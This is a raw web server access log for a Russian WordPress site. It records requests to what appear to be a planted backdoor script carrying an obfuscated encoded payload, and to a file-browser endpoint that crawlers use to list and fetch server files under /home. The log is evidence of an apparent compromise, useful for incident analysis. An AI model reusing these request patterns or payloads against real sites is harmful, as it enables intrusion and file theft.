212.16.195.25 - - [30/Oct/2025:05:25:49 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313736393339392p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736353739392q3639396539333063396636653266643965623863653235626536323764396466222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:25:50 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/revisions.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 9374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:25:51 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/xmlrpc.php&path=/home/region-gk.ru/data/www/region-gk.ru HTTP/1.1" 200 25424 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:25:54 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/image-edit.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 16184 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:25:58 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/code-editor.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 7084 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:26:02 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/auth-app.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 5299 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:26:06 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/accordion.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 4304 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.130 - - [30/Oct/2025:05:26:10 +1000] "GET /0?path=/home/region-gk.ru HTTP/1.1" 200 3478 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:26:11 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/word-count.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3875 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.130 - - [30/Oct/2025:05:26:14 +1000] "GET /0?path=/home/region-gk.ru/data/www HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.129 - - [30/Oct/2025:05:26:15 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-login.php&path=/home/region-gk.ru/data/www/region-gk.ru HTTP/1.1" 200 25564 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:26:17 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/inline-edit-tax.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 4563 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:26:18 +1000] "GET /0?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/1.1" 200 11256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:26:21 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/widgets.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 10885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:05:26:23 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313736393433332p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736353833332q3131653464393338363335343966376165396364326334656332373665343530222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:26:26 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/color-picker.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 4536 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:26:30 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/xfn.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3422 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:26:34 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-mail.php&path=/home/region-gk.ru/data/www/region-gk.ru HTTP/1.1" 200 25423 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:26:34 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/postbox.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 5872 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:26:39 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/customize-nav-menus.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 36925 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:26:42 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-signup.php&path=/home/region-gk.ru/data/www/region-gk.ru HTTP/1.1" 200 25464 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:26:44 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/inline-edit-tax.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 4563 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:26:47 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/iris.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 12914 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:26:48 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/postnews.php&path=/home/region-gk.ru/data/www/region-gk.ru HTTP/1.1" 200 25557 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:26:52 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/media.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 5804 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:05:26:54 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313736393436342p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736353836342q6433363634373435363866656134663936363433336337373530303637303830222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:26:56 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/theme.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 12761 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:27:00 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/customize-nav-menus.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 19370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:27:03 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php&path=/home/region-gk.ru/data/www/region-gk.ru HTTP/1.1" 200 25425 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:27:04 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/theme-plugin-editor.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 7573 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:27:07 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/customize-controls.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 42321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:27:11 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-comments-post.php&path=/home/region-gk.ru/data/www/region-gk.ru HTTP/1.1" 200 25511 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.255.231.110 - - [30/Oct/2025:05:27:14 +1000] "GET /zhbi-izdeliya/?yadirect&etext=2202.Dhki-CVITgyMeHyD5Nkc29v_mftI9TggRhHJ422WfzDQsla46dJg0LN6ZOb1qEkheGFsdmp5emNobnBlanJxaQ.649c4b6c24861912cb996dc62c90a31d8b153def HTTP/1.1" 200 5643 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
20.171.207.35 - - [30/Oct/2025:05:27:16 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/theme-plugin-editor.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 7573 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:27:19 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/inputs.php&path=/home/region-gk.ru/data/www/region-gk.ru HTTP/1.1" 200 25412 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:27:20 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/customize-controls.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 42321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:27:25 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/1.txt&path=/home/region-gk.ru/data/www/region-gk.ru HTTP/1.1" 200 3154 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:05:27:27 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313736393439372p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736353839372q6436653730623432306432653232663663643833333533623737666161633432222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:05:27:27 +1000] "GET /shopbrand/1494710129.shtm HTTP/1.1" 200 26698 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:27:29 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/password-strength-meter.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3800 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:27:32 +1000] "GET /shopbrand/936857300.shtm HTTP/1.1" 200 27280 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:27:33 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/custom-background.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:27:36 +1000] "GET /0?path=/home/region-gk.ru/data/www/region-gk.ru/wp-includes HTTP/1.1" 200 22777 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:27:38 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/custom-background.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:27:42 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/language-chooser.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3426 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:27:46 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/customize-nav-menus.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 19365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:27:49 +1000] "GET /0?path=/home HTTP/1.1" 200 7256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:27:52 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/password-strength-meter.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3800 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:27:56 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/theme-plugin-editor.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 7573 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:05:27:58 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313736393532382p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736353932382q3533636437366462383363613065366461643464383763333130336665343037222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:28:00 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/password-strength-meter.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 4812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:28:02 +1000] "GET /0?path=/home/region-gk.ru/data/www/region-gk.ru/images HTTP/1.1" 200 3757 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:05:28:04 +1000] "GET /shopbrand/934657291.shtm HTTP/1.1" 200 25768 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:28:04 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/language-chooser.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3426 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:28:07 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/password-strength-meter.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3800 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:28:10 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-blog-header.php&path=/home/region-gk.ru/data/www/region-gk.ru HTTP/1.1" 200 25528 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:28:10 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/customize-controls.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 42321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:28:11 +1000] "GET /0?path=/home/region-gk.ru/data/www/region-gk.ru/wp-content HTTP/1.1" 200 4738 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:28:15 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/theme-plugin-editor.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 7573 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:28:16 +1000] "GET /shopbrand/1874711735.shtm HTTP/1.1" 200 25941 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:28:18 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/customize-nav-menus.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 19370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:28:24 +1000] "GET /shopbrand/446309045.shtm HTTP/1.1" 200 24321 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:28:25 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/password-strength-meter.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 4812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:28:29 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/password-strength-meter.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 4812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:05:28:33 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313736393536332p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736353936332q3237356661336632623266613831643662663066623333313965363561386561222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:28:33 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/password-strength-meter.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 4812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:28:33 +1000] "GET /shopbrand/446311777.shtm HTTP/1.1" 200 23655 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:05:28:37 +1000] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
